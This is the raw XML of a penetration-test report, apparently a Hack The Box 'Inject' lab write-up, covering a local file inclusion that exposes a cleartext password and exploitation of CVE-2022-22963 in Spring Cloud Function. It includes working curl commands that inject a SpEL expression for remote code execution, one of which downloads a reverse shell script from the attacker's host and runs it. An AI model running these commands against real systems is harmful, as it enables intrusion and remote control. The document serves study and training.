                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>”).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3063752B" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7292C8A3" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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EAF753B" wp14:editId="0C314874">
                  <wp:extent cx="4052455" cy="2299265"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
                  <wp:docPr id="20" name="Imagen 20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880" cy="230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80323" w14:textId="77777777" w:rsidR="00404FA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 xml:space="preserve"> HTTP Request to trigger </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>LFI</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0E0D1B2D" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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9B552D2" wp14:editId="1C372379">
                  <wp:extent cx="3547655" cy="4114800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="21" name="Imagen 2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Text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13" cy="4121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84F70" w14:textId="77777777" w:rsidR="00404FA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 LFI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306C371B" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D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it can be seen, LFI vulnerability is found. The next step is to search for juicy files. A cleartext password for user “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>phil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>” is found on “/home/frank/.m2/settings.xml” (</w:t>
            </w:r>
            <w:r w:rsidRPr="00602775">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DocPhillovestoInject123</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="428AE239" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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A58A2FD" wp14:editId="05718913">
                  <wp:extent cx="5632450" cy="1889125"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="13" name="Imagen 13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56F42" w14:textId="77777777" w:rsidR="00404FA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 xml:space="preserve"> Cleartext password for user </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>phil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="025A2CEB" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00602775" w:rsidRDefault="00404FAF" w:rsidP="00086D73"/>
          <w:p w14:paraId="5879E319" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D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Another juicy file is found ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="002E136D">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/var/www/WebApp/pom.xml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>’, inside it, we can see all the dependencies used in the application. As it can be seen, it uses spring-cloud-function-web which has a known vulnerability CVE-</w:t>
            </w:r>
            <w:r w:rsidRPr="002E136D">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2022-22963</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="570A2AF9" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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FA4441D" wp14:editId="0BD5FECE">
                  <wp:extent cx="5632450" cy="2633345"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="23" name="Imagen 23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Interfaz de usuario gráfica, Texto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F6AB9" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Descripcin"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr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 xml:space="preserve"> Spring Cloud Dependency</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4E1400" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00FE4AAD" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A6200D7" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Ttulo3"/>
              <w:spacing w:after="240"/>
            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="_Toc92992246"/>
            <w:r>
              <w:t xml:space="preserve">4.1.2 Initial Access – </w:t>
            </w:r>
            <w:bookmarkEnd w:id="3"/>
            <w:r>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC724D4" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00CD1E37" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Roboto Regular" w:hAnsiTheme="minorHAnsi" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vulnerability Explanation:</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD1E3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Spring Cloud Function versions 3.1.6, 3.2.2 and older versions are vulnerable to RCE if routing functionality is used. It is possible for a user to provide </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>an</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> specially crafted </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SpEL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> as a routing-expression that may result in remote code execution (“</w:t>
            </w:r>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidRPr="009A6CBE">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://nvd.nist.gov/vuln/detail/CVE-2022-22963</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDCA213" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00CD1E37" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Roboto Regular" w:hAnsiTheme="minorHAnsi" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vulnerability Fix:</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD1E3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Users should upgrade to version 3.1.7 or 3.2.3. (“</w:t>
            </w:r>
            <w:r w:rsidRPr="004C6635">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>https://spring.io/security/cve-2022-22963</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11426A34" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00AB0FD9" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Roboto Bold" w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:color="FF0000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BF10251" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00DA54EA" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Steps to reproduce the attack:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004C6635">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>In order</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> reproduce the attack, a POST HTTP request must be made. Using curl the command is the following</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>:  “</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>curl -X POST  http://inject.htb:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("command-to-execute")' --data-raw 'data' -v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">” </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>.  We will obtain RCE and execute command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">s. PoC obtained here </w:t>
            </w:r>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidRPr="009A6CBE">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://github.com/me2nuk/CVE-2022-22963</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="27F2A476" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Proof of Concept Code:</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD1E37">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To obtain a shell in the machine, the following steps were taken:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="229BFDD6" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00404FAF">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Create a local </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> file containing a bash reverse shell called “</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>shell.sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">”. And start a python simple http server on port 8000 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>in order to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> serve “shell.sh”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5565D2B5" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="41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B9CD877" wp14:editId="3B29067A">
                  <wp:extent cx="4953000" cy="1438275"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="24" name="Imagen 24" descr="Interfaz de usuario gráfic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Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente con confianza media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14D09" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Descripcin"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
              </w:rPr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Shell.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50051F98" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00DA54EA" w:rsidRDefault="00404FAF" w:rsidP="00404FAF">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Download it on the victim using: “</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>POST  http://inject.htb:8080/functionRouter</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://10.10.14.7:8000/shell.sh -O /tmp/shell.sh ")' --data-raw 'data' -v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F99F570" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00404FAF">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Make it executable using: “</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>POST  http://inject.htb:8080/functionRouter</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/shell.sh ")' --data-raw 'data' -v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0069C71F" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00404FAF">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Execute it with: “</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>POST  http://inject.htb:8080/functionRouter</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA54EA">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("./tmp/shell.sh ")' --data-raw 'data' -v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7508A66F" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00404FAF">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Receive the reverse connection and get the shell.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67E5D6AD" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/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EA4778" wp14:editId="49C49591">
                  <wp:extent cx="3933645" cy="3241821"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="25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 descr="Texto&#10;&#10;Descripción generada automáticament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324" cy="3263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997B7" w14:textId="77777777" w:rsidR="00404FA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>
              <w:t xml:space="preserve"> Shell opened as </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>frank</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="28EE44C3" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D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next step is to use the previously found cleartext credential and try to access as user “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>phil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>”.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57D0BB4A" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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5AAC6C0" wp14:editId="53977CE1">
                  <wp:extent cx="4943475" cy="2466975"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="26" name="Imagen 2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 descr="Texto&#10;&#10;Descripción generada automáticament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DE689" w14:textId="77777777" w:rsidR="00404FA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>
              <w:t xml:space="preserve"> Shell opened as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>phil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1372221D" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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59EA85D" wp14:editId="62ADF5D0">
                  <wp:extent cx="4924425" cy="838200"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="14" name="Imagen 14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Texto&#10;&#10;Descripción generada automáticament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36E41" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00351794" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Descripcin"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Ilustración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user.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EF98489" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="0060132B" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
